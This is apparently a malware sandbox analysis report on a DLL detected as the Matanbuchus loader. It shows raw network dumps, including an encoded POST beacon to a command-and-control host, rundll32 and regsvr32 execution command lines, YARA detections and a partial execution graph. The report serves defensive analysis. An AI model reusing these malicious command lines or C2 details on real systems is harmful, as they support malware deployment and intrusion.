                        Data Ascii: 1G+BmJ4Qj8xzSY0ieZwQO5xwy6xB2C+gmVOsYFhpmw8GpNIk78Aek7pUnEjrParkVH+KHJix9aIFhNTFkCnQ5GYSRBN0VYpiFPX2rOjEK2CZ1qTUhO/AHt4wCgxSSk0mjEDY76AbHhGIzHYMccqsQN8voB5eMA8Ik0sKaVsrfDPPyxcpFITvoJ4eEAvCr4QVlqTUjFlBGapoGEgr2AlT/GpM2dCNQvssELgSZY5wC3H5mFOGhNy4p5xRy
                        2025-01-16 05:04:04 UTC16384INData Raw: 58 46 48 4f 4c 30 54 45 35 78 54 44 4b 37 73 73 4d 4c 2b 55 38 4a 62 73 51 64 79 76 6f 42 33 65 46 63 77 52 76 78 78 78 7a 71 7a 58 42 50 0d 0a 42 45 57 65 4c 35 46 4a 54 6e 46 4d 73 6d 32 4b 44 5a 4a 78 54 46 6c 71 78 77 57 53 2b 51 47 75 5a 66 73 64 75 66 53 65 4c 48 30 6c 51 56 78 78 54 44 47 36 43 30 42 65 47 65 41 36 59 6c 32 67 0d 0a 39 36 56 4a 57 65 6d 4a 52 4d 55 38 73 4e 6f 54 58 55 67 37 5a 69 52 54 65 45 31 49 4a 71 45 4b 55 58 6f 6c 6f 43 31 35 58 4c 48 7a 6d 55 31 4f 38 6f 68 56 34 51 68 41 78 2f 51 77 70 70 57 79 0d 0a 79 36 4a 68 78 35 58 6a 36 44 69 78 6a 72 50 53 2f 7a 47 33 73 59 34 65 73 59 4d 4a 74 37 48 36 43 61 58 68 42 56 69 6d 6e 2f 68 5a 61 73 59 46 73 76 6f 4e 53 65 47 6f 46 59 78 31 54 4a 57 6d 0d 0a 47 4d 4f 69 47 37 4d 78 78
                        Data Ascii: XFHOL0TE5xTDK7ssML+U8JbsQdyvoB3eFcwRvxxxzqzXBPBEWeL5FJTnFMsm2KDZJxTFlqxwWS+QGuZfsdufSeLH0lQVxxTDG6C0BeGeA6Yl2g96VJWemJRMU8sNoTXUg7ZiRTeE1IJqEKUXoloC15XLHzmU1O8ohV4QhAx/QwppWyy6Jhx5Xj6DixjrPS/zG3sY4esYMJt7H6CaXhBVimn/hZasYFsvoNSeGoFYx1TJWmGMOiG7Mxx
                        2025-01-16 05:04:04 UTC16384INData Raw: 41 36 53 59 38 4c 6a 62 4f 6d 6c 62 4c 46 41 37 6d 6b 66 47 46 50 53 45 48 48 43 5a 45 36 0d 0a 77 41 57 65 6d 58 51 63 61 45 33 44 43 33 6d 6c 51 6d 68 4e 53 4d 55 38 76 4e 71 72 53 63 48 44 67 62 4b 6d 6c 66 64 4d 54 6e 46 4d 4d 71 69 79 77 38 4f 42 73 71 61 56 54 67 6c 4b 2b 4d 6d 31 0d 0a 6c 4c 4b 33 78 65 53 67 70 35 57 79 77 30 7a 34 79 62 47 55 73 72 66 46 2f 4b 53 6e 6c 62 4c 49 64 33 41 35 55 4b 30 49 36 45 39 78 54 46 6d 42 53 6f 38 4c 30 55 78 5a 61 6b 33 43 47 39 48 45 0d 0a 44 4c 56 43 2f 67 75 75 79 5a 6b 66 57 69 42 70 59 6b 78 5a 41 70 30 4f 52 6d 45 6b 39 51 6c 46 57 4b 61 65 36 56 78 71 7a 6f 78 43 2b 68 6d 70 36 54 64 6b 54 67 52 46 6e 69 2f 52 53 55 35 78 0d 0a 54 4c 4a 74 69 67 33 53 63 55 78 5a 61 73 63 4e 30 76 6b 4a 68 32 58 37 42
                        Data Ascii: A6SY8LjbOmlbLFA7mkfGFPSEHHCZE6wAWemXQcaE3DC3mlQmhNSMU8vNqrScHDgbKmlfdMTnFMMqiyw8OBsqaVTglK+Mm1lLK3xeSgp5Wyw0z4ybGUsrfF/KSnlbLId3A5UK0I6E9xTFmBSo8L0UxZak3CG9HEDLVC/guuyZkfWiBpYkxZAp0ORmEk9QlFWKae6VxqzoxC+hmp6TdkTgRFni/RSU5xTLJtig3ScUxZascN0vkJh2X7B
                        2025-01-16 05:04:04 UTC16384INData Raw: 4b 33 39 48 42 4d 57 57 72 49 6d 6a 74 71 0d 0a 69 68 79 6f 54 59 38 4c 6a 62 4f 6d 6c 62 4c 46 41 36 32 6b 31 4b 4e 4d 53 4d 51 30 6a 72 41 7a 51 45 68 4f 6d 43 31 64 61 6b 33 44 43 34 48 50 6d 54 49 64 77 77 4e 35 70 4c 6a 41 73 72 66 33 0d 0a 63 45 78 5a 61 73 69 42 4f 32 71 4b 48 4b 74 4e 6a 77 75 4e 73 36 61 56 73 73 55 44 72 61 51 4d 6f 30 78 49 78 44 53 4e 73 45 74 41 53 45 36 59 5a 56 31 71 54 63 4d 62 67 63 66 62 36 6b 31 49 0d 0a 54 76 72 47 33 57 70 4e 53 4d 66 30 4d 4b 53 56 73 73 48 44 38 62 47 6d 6c 63 62 64 4d 6f 79 7a 70 75 48 49 79 4c 4f 4f 73 39 44 2f 4c 62 57 78 6a 73 58 63 44 72 43 33 73 66 7a 42 4f 5a 65 79 0d 0a 74 78 2f 36 41 56 47 43 69 2f 61 78 6a 76 5a 59 61 6b 31 49 79 36 4d 35 51 71 77 49 69 45 36 32 43 61 57 56 73 72 65 78 2f
                        Data Ascii: K39HBMWWrImjtqihyoTY8LjbOmlbLFA62k1KNMSMQ0jrAzQEhOmC1dak3DC4HPmTIdwwN5pLjAsrf3cExZasiBO2qKHKtNjwuNs6aVssUDraQMo0xIxDSNsEtASE6YZV1qTcMbgcfb6k1ITvrG3WpNSMf0MKSVssHD8bGmlcbdMoyzpuHIyLOOs9D/LbWxjsXcDrC3sfzBOZeytx/6AVGCi/axjvZYak1Iy6M5QqwIiE62CaWVsrex/
                        2025-01-16 05:04:04 UTC16384INData Raw: 42 61 72 36 47 62 32 74 54 30 68 4f 63 55 7a 53 4c 36 6d 50 44 6e 56 4d 57 57 70 4e 77 77 4f 56 69 78 68 69 54 55 68 4f 63 59 6f 63 6c 6b 7a 44 47 35 6e 50 6d 33 72 45 48 5a 4c 36 43 59 58 6a 0d 0a 43 49 7a 44 50 4c 34 49 5a 66 73 64 76 79 50 48 46 4b 36 6c 4e 66 47 50 73 39 49 76 6b 59 38 4f 66 55 78 5a 61 6b 32 4f 43 34 31 4f 30 69 65 6c 79 34 39 52 78 52 53 79 78 68 32 57 2b 42 6d 5a 0d 0a 35 77 69 34 48 6e 37 36 46 49 55 63 77 77 4f 78 70 42 62 56 73 37 66 46 4a 4a 53 65 4b 45 46 49 54 6e 46 4d 6e 79 2b 78 53 38 55 30 70 4a 34 71 66 55 68 4f 63 55 7a 53 4a 36 57 4f 44 30 56 4d 0d 0a 30 6a 2b 6c 79 34 78 4a 78 51 79 2b 39 55 78 4f 63 55 77 79 6f 6b 54 44 47 36 57 4c 58 57 42 4e 53 45 35 78 69 68 79 57 53 63 55 4c 66 52 7a 53 4a 35 6d 67 4f 2b 4a 4e 57
                        Data Ascii: Bar6Gb2tT0hOcUzSL6mPDnVMWWpNwwOVixhiTUhOcYoclkzDG5nPm3rEHZL6CYXjCIzDPL4IZfsdvyPHFK6lNfGPs9IvkY8OfUxZak2OC41O0iely49RxRSyxh2W+BmZ5wi4Hn76FIUcwwOxpBbVs7fFJJSeKEFITnFMny+xS8U0pJ4qfUhOcUzSJ6WOD0VM0j+ly4xJxQy+9UxOcUwyokTDG6WLXWBNSE5xihyWScULfRzSJ5mgO+JNW
                        2025-01-16 05:04:04 UTC16384INData Raw: 6d 58 67 62 62 6b 32 50 43 34 32 7a 70 70 57 79 78 51 50 4e 70 43 6b 45 54 45 6a 46 4e 4b 44 61 55 6b 30 39 57 52 6d 6a 66 47 70 4e 49 4a 34 33 0d 0a 52 45 6b 43 34 52 78 47 59 61 54 6f 63 45 68 49 7a 62 56 41 30 6a 2b 68 77 30 7a 37 52 4e 45 6e 70 63 67 7a 6d 55 30 74 59 73 30 31 70 6e 4d 34 63 6f 45 66 77 78 75 64 78 78 78 69 78 67 4a 4b 0d 0a 53 67 52 64 48 30 53 50 43 35 56 4e 57 57 70 4e 6f 30 6d 32 43 62 31 71 54 55 68 4f 2b 78 6d 39 34 68 69 37 78 44 53 2f 73 6a 62 47 44 61 4c 36 41 56 48 68 48 55 42 31 49 45 51 73 59 34 6f 4e 0d 0a 72 6e 42 4d 57 57 71 6d 54 34 6b 30 72 46 6c 71 54 55 6a 45 4e 4b 7a 52 4c 37 2f 43 43 34 4f 6e 61 75 45 41 51 4d 55 67 51 4e 41 2f 6d 63 4d 4c 6e 63 63 52 5a 73 51 46 6c 76 6f 5a 67 56 45 59 0d 0a 6e 44 74 34 69 78 79
                        Data Ascii: mXgbbk2PC42zppWyxQPNpCkETEjFNKDaUk09WRmjfGpNIJ43REkC4RxGYaTocEhIzbVA0j+hw0z7RNEnpcgzmU0tYs01pnM4coEfwxudxxxixgJKSgRdH0SPC5VNWWpNo0m2Cb1qTUhO+xm94hi7xDS/sjbGDaL6AVHhHUB1IEQsY4oNrnBMWWqmT4k0rFlqTUjENKzRL7/CC4OnauEAQMUgQNA/mcMLnccRZsQFlvoZgVEYnDt4ixy


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        95192.168.2.66447594.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:04:04 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:04:04 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:04:04 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:04:04 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:04:04 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:00:01:56
                        Start date:16/01/2025
                        Path:C:\Windows\System32\loaddll32.exe
                        Wow64 process (32bit):true
                        Commandline:loaddll32.exe "C:\Users\user\Desktop\file.dll"
                        Imagebase:0x320000
                        File size:126'464 bytes
                        MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:1
                        Start time:00:01:56
                        Start date:16/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        General

                        Target ID:2
                        Start time:00:01:56
                        Start date:16/01/2025
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\file.dll",#1
                        Imagebase:0x1c0000
                        File size:236'544 bytes
                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        General

                        Target ID:3
                        Start time:00:01:56
                        Start date:16/01/2025
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe C:\Users\user\Desktop\file.dll,DllInstall
                        Imagebase:0x7a0000
                        File size:61'440 bytes
                        MD5 hash:889B99C52A60DD49227C5E485A016679
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 00000003.00000002.2210377846.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000003.00000002.2210553685.00000000051AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000003.00000002.2210553685.00000000051AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:5
                        Start time:00:01:56
                        Start date:16/01/2025
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",#1
                        Imagebase:0x7a0000
                        File size:61'440 bytes
                        MD5 hash:889B99C52A60DD49227C5E485A016679
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000005.00000002.3397711298.000000000507E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000005.00000002.3397711298.000000000507E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                        Reputation:high
                        Has exited:false

                        General

                        Target ID:7
                        Start time:00:01:59
                        Start date:16/01/2025
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe C:\Users\user\Desktop\file.dll,Export
                        Imagebase:0x7a0000
                        File size:61'440 bytes
                        MD5 hash:889B99C52A60DD49227C5E485A016679
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:8
                        Start time:00:02:01
                        Start date:16/01/2025
                        Path:C:\Windows\System32\regsvr32.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd"
                        Imagebase:0x7ff6caf60000
                        File size:25'088 bytes
                        MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:9
                        Start time:00:02:01
                        Start date:16/01/2025
                        Path:C:\Windows\SysWOW64\regsvr32.exe
                        Wow64 process (32bit):true
                        Commandline: -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd"
                        Imagebase:0xd80000
                        File size:20'992 bytes
                        MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000009.00000002.2233332273.000000000508B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000009.00000002.2233332273.000000000508B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:10
                        Start time:00:02:02
                        Start date:16/01/2025
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe C:\Users\user\Desktop\file.dll,Main
                        Imagebase:0x7a0000
                        File size:61'440 bytes
                        MD5 hash:889B99C52A60DD49227C5E485A016679
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:11
                        Start time:00:02:05
                        Start date:16/01/2025
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",DllInstall
                        Imagebase:0x7a0000
                        File size:61'440 bytes
                        MD5 hash:889B99C52A60DD49227C5E485A016679
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 0000000B.00000002.2258768567.000000007FC30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 0000000B.00000002.2258768567.000000007FC30000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 0000000B.00000002.2258768567.000000007FC30000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 0000000B.00000002.2258285565.000000000544F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 0000000B.00000002.2258285565.000000000544F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:12
                        Start time:00:02:05
                        Start date:16/01/2025
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",Export
                        Imagebase:0x7a0000
                        File size:61'440 bytes
                        MD5 hash:889B99C52A60DD49227C5E485A016679
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:13
                        Start time:00:02:05
                        Start date:16/01/2025
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",Main
                        Imagebase:0x7a0000
                        File size:61'440 bytes
                        MD5 hash:889B99C52A60DD49227C5E485A016679
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:14
                        Start time:00:02:05
                        Start date:16/01/2025
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_setopt
                        Imagebase:0x7a0000
                        File size:61'440 bytes
                        MD5 hash:889B99C52A60DD49227C5E485A016679
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:15
                        Start time:00:02:05
                        Start date:16/01/2025
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_perform
                        Imagebase:0x7a0000
                        File size:61'440 bytes
                        MD5 hash:889B99C52A60DD49227C5E485A016679
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:16
                        Start time:00:02:05
                        Start date:16/01/2025
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_init
                        Imagebase:0x7ff66e660000
                        File size:61'440 bytes
                        MD5 hash:889B99C52A60DD49227C5E485A016679
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:17
                        Start time:00:02:05
                        Start date:16/01/2025
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_cleanup
                        Imagebase:0x7a0000
                        File size:61'440 bytes
                        MD5 hash:889B99C52A60DD49227C5E485A016679
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:18
                        Start time:00:02:05
                        Start date:16/01/2025
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",UnregisterDll
                        Imagebase:0x7a0000
                        File size:61'440 bytes
                        MD5 hash:889B99C52A60DD49227C5E485A016679
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:21
                        Start time:00:02:06
                        Start date:16/01/2025
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 624
                        Imagebase:0xa60000
                        File size:483'680 bytes
                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:26
                        Start time:00:03:00
                        Start date:16/01/2025
                        Path:C:\Windows\System32\regsvr32.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd"
                        Imagebase:0x7ff6caf60000
                        File size:25'088 bytes
                        MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:27
                        Start time:00:03:00
                        Start date:16/01/2025
                        Path:C:\Windows\SysWOW64\regsvr32.exe
                        Wow64 process (32bit):true
                        Commandline: -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd"
                        Imagebase:0xd80000
                        File size:20'992 bytes
                        MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 0000001B.00000002.2807563546.0000000004ED7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 0000001B.00000002.2807563546.0000000004ED7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 0000001B.00000002.2808336693.000000007F7F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 0000001B.00000002.2808336693.000000007F7F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 0000001B.00000002.2808336693.000000007F7F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        Has exited:true

                        General

                        Target ID:28
                        Start time:00:04:00
                        Start date:16/01/2025
                        Path:C:\Windows\System32\regsvr32.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd"
                        Imagebase:0x7ff6caf60000
                        File size:25'088 bytes
                        MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:false

                        General

                        Target ID:29
                        Start time:00:04:00
                        Start date:16/01/2025
                        Path:C:\Windows\SysWOW64\regsvr32.exe
                        Wow64 process (32bit):true
                        Commandline: -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd"
                        Imagebase:0xd80000
                        File size:20'992 bytes
                        MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:false

                        Disassembly

                        Reset < >

                          Execution Graph

                          Execution Coverage:1%
                          Dynamic/Decrypted Code Coverage:79.2%
                          Signature Coverage:46.5%
                          Total number of Nodes:101
                          Total number of Limit Nodes:2
                          execution_graph 43608 7ef4afe0 43626 7ef17a60 43608->43626 43614 7ef4b058 GetPEB 43616 7ef4b0a1 43614->43616 43615 7ef4b029 43615->43614 43684 7ef17920 CreateMutexA 43616->43684 43619 7ef4b250 ExitProcess 43620 7ef4b258 GetPEB 43621 7ef4b30f 43620->43621 43688 7ef02100 GetPEB 43621->43688 43623 7ef4b4f0 43689 7ef02370 GetPEB 43623->43689 43625 7ef4b502 43627 7ef17a7f 43626->43627 43690 7ef022b0 43627->43690 43629 7ef17c7f 43632 7ef022b0 GetPEB 43629->43632 43634 7ef17ddc 43632->43634 43633 7ef17f4c 43636 7ef022b0 GetPEB 43633->43636 43634->43633 43707 7ef01f50 GetPEB 43634->43707 43637 7ef180b4 43636->43637 43640 7ef18241 43637->43640 43708 7ef01f50 GetPEB 43637->43708 43639 7ef022b0 GetPEB 43642 7ef18394 43639->43642 43640->43639 43641 7ef184fa 43644 7ef022b0 GetPEB 43641->43644 43642->43641 43709 7ef01f50 GetPEB 43642->43709 43646 7ef1864d 43644->43646 43645 7ef187b3 43648 7ef022b0 GetPEB 43645->43648 43646->43645 43710 7ef01f50 GetPEB 43646->43710 43650 7ef1892d 43648->43650 43649 7ef18a81 43694 7ef0fd90 43649->43694 43650->43649 43711 7ef01f50 GetPEB 43650->43711 43652 7ef18a93 43698 7ef02310 43652->43698 43656 7ef18afd 43702 7ef103f0 43656->43702 43659 7ef18ad5 43713 7ef020d0 GetPEB 43659->43713 43660 7ef18b0f 43661 7ef02310 GetPEB 43660->43661 43663 7ef18b30 43661->43663 43664 7ef18b79 43663->43664 43714 7ef0b630 44 API calls swprintf 43663->43714 43664->43625 43668 7ef22a30 43664->43668 43666 7ef18b51 43715 7ef020d0 GetPEB 43666->43715 43670 7ef22a63 43668->43670 43669 7ef22ac2 GetPEB 43672 7ef22b51 43669->43672 43670->43669 43671 7ef22da0 GetPEB 43673 7ef22e32 GetPEB 43671->43673 43672->43671 43675 7ef2307f GetPEB 43673->43675 43679 7ef232a0 PathIsDirectoryW 43675->43679 43678 7ef23477 43678->43625 43680 7ef0c9e0 43678->43680 43679->43678 43681 